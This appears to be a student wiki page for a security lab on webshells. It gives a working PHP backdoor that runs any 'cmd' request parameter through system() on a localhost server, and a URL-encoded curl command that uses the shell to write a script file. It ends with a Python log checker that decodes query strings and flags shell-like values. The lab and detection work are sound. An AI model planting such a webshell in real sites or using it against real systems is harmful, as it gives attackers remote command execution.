Assignment 7.1: Webshells - squatchulator/Tech-Journal GitHub Wiki
- Make a new directory called Webshells, and create a basic HTML file called `index.html`.
- In the same folder, create `<yourname>_backdoor.php`. Add the following to the file:
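```php
<?php
// Full opening tag: the short "<?" form only works when short_open_tag is enabled.
// Lab webshell: runs the value of the "cmd" request parameter as a shell command.
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd); // output of the command is written straight into the response
    echo "</pre>";
    die;
}
?>
```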
- Install PHP if you do not have it already with `sudo apt-get install php`
- Spawn a new webserver instance with `php -S localhost:8000`
- Now, in a web browser, visit `http://localhost:8000/<yourname>_backdoor.php?cmd=<command>`
NOTE:
- When using the webshell, you need to consider which characters must be URL encoded. The one-liner below takes into account that the characters `!`, `#`, `\`, and `/` need to be encoded in order to be passed through the URL field as literal characters.
- Example:

```
curl "http://localhost:8000/Webshell/<yourname>_backdoor.php?cmd=echo+'%23%21%2Fbin%2Fbash%5Cnsystemctl%0A'+>+script.sh"
```
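The same URL encoding also hides the command in the web server's request log until the query string is decoded. The following is an added example, not part of the original wiki page: it decodes query strings from constructed log lines modelled on `php -S` output and flags parameter values that look like shell commands. The file name `student_backdoor.php`, the log lines and the indicator list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines, modelled on the request log that `php -S` prints.
# "student_backdoor.php" is a placeholder file name.
SAMPLE_LOG = """\
[Mon Mar  4 10:15:01 2024] 127.0.0.1:51234 [200]: GET /index.html
[Mon Mar  4 10:15:09 2024] 127.0.0.1:51240 [200]: GET /student_backdoor.php?cmd=id
[Mon Mar  4 10:15:30 2024] 127.0.0.1:51262 [200]: GET /student_backdoor.php?cmd=echo+'%23%21%2Fbin%2Fbash%5Cnsystemctl%0A'+>+script.sh
[Mon Mar  4 10:16:02 2024] 127.0.0.1:51290 [200]: GET /search.php?q=web+shells&page=2
"""

# Status code, method and request URI as they appear in each log line.
REQUEST = re.compile(r"\[(\d{3})\]: (\w+) (\S+)")

# Heuristic indicators of a shell command in a decoded value (assumed list):
# shebang, /bin/ path, shell metacharacters, $( ... ), or a leading command word.
SHELL_HINTS = re.compile(r"#!|/bin/|[;|`<>]|\$\(|^(?:id|whoami|uname|echo|cat|ls)\b")


def find_command_params(log_text):
    """Return (path, parameter, decoded value) for values that look like commands."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        uri = urlsplit(match.group(3))
        # parse_qsl reverses the URL encoding: '+' becomes a space, %XX a character.
        for name, value in parse_qsl(uri.query, keep_blank_values=True):
            if SHELL_HINTS.search(value):
                findings.append((uri.path, name, value))
    return findings


if __name__ == "__main__":
    for path, name, value in find_command_params(SAMPLE_LOG):
        # repr() keeps decoded newlines and backslashes visible on one line.
        print(f"{path} {name}={value!r}")
```

Matching on the decoded value rather than the raw request line is what makes the `%23%21%2Fbin%2Fbash` form visible as `#!/bin/bash`.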